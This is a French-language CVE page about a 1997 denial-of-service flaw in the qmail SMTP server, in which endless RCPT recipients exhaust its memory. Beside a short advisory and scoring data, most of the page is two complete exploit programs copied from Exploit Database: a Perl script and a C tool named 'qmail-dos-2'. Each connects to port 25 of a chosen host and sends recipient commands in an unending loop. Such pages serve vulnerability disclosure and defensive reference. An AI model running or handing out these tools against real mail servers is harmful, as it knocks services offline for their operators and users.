Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Denial of service in Qmail by specifying a large number of recipients with the RCPT command.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| No informations. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 2.1 | AV:L/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 20561
Date de publication : 1997-06-11 22h00 +00:00
Auteur : Frank DENIS
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/2237/info
qmail is an e-mail server package developed by Dan Bernstein.
The qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding.
This behaviour is due to the dynamically allocated memory being exhausted.
The condition occurs in situations where resource limits are not imposed on the server process.
Many systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers.
Once affected, a restart of the qmail smtp service is required in order to gain normal functionality.
It should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers.
#!/usr/local/bin/perl -w
# $Id: qmail.pl,v 1.4 1997/06/12 02:12:42 super Exp $
require 5.002;
use strict;
use Socket;
if(!($ARGV[0])){print("usage: $0 FQDN","\n");exit;}
my $port = 25; my $proto = getprotobyname("tcp");
my $iaddr = inet_aton($ARGV[0]) || die "No such host: $ARGV[0]";
my $paddr = sockaddr_in($port, $iaddr);
socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!";
connect(SKT, $paddr) && print("Connected established.\n") || die "connect() $!";
send(SKT,"mail from: <me\@me>\n",0) || die "send() $!";
my $infstr = "rcpt to: <me\@" . $ARGV[0] . ">\n"; print("Attacking..","\n");
while(<SKT>){
send(SKT,$infstr,0) || die "send() $!";
}
die "Connection lost!";
Exploit Database EDB-ID : 20562
Date de publication : 1997-06-11 22h00 +00:00
Auteur : Wietse Venema
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/2237/info
qmail is an e-mail server package developed by Dan Bernstein.
The qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding.
This behaviour is due to the dynamically allocated memory being exhausted.
The condition occurs in situations where resource limits are not imposed on the server process.
Many systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers.
Once affected, a restart of the qmail smtp service is required in order to gain normal functionality.
It should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers.
/*
* qmail-dos-2 - run a qmail system out of swap space by feeding an infinite
* amount of recipients.
*
* Usage: qmail-dos-2 fully-qualified-hostname
*
* Author: Wietse Venema. The author is not responsible for abuse of this
* program. Use at your own risk.
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdarg.h>
#include <errno.h>
#include <stdio.h>
void fatal(char *fmt,...)
{
va_list ap;
va_start(ap, fmt);
vfprintf(stderr, fmt, ap);
va_end(ap);
putc('\n', stderr);
exit(1);
}
chat(FILE * fp, char *fmt,...)
{
char buf[BUFSIZ];
va_list ap;
fseek(fp, 0L, SEEK_SET);
va_start(ap, fmt);
vfprintf(fp, fmt, ap);
va_end(ap);
fputs("\r\n", fp);
if (fflush(fp))
fatal("connection lost");
fseek(fp, 0L, SEEK_SET);
if (fgets(buf, sizeof(buf), fp) == 0)
fatal("connection lost");
if (atoi(buf) / 100 != 2)
fatal("%s", buf);
}
int main(int argc, char **argv)
{
struct sockaddr_in sin;
struct hostent *hp;
char buf[BUFSIZ];
int sock;
FILE *fp;
if (argc != 2)
fatal("usage: %s host", argv[0]);
if ((hp = gethostbyname(argv[1])) == 0)
fatal("host %s not found", argv[1]);
memset((char *) &sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr));
sin.sin_port = htons(25);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
fatal("socket: %s", strerror(errno));
if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0)
fatal("connect to %s: %s", argv[1], strerror(errno));
if ((fp = fdopen(sock, "r+")) == 0)
fatal("fdopen: %s", strerror(errno));
if (fgets(buf, sizeof(buf), fp) == 0)
fatal("connection lost");
chat(fp, "mail from:<me@me>", fp);
for (;;)
chat(fp, "rcpt to:<me@%s>", argv[1]);
}
Products Mentioned
Configuraton 0
Qmail_project>>Qmail >> Version -
- Qmail_project>>Qmail >> Version - (Open CPE detail)
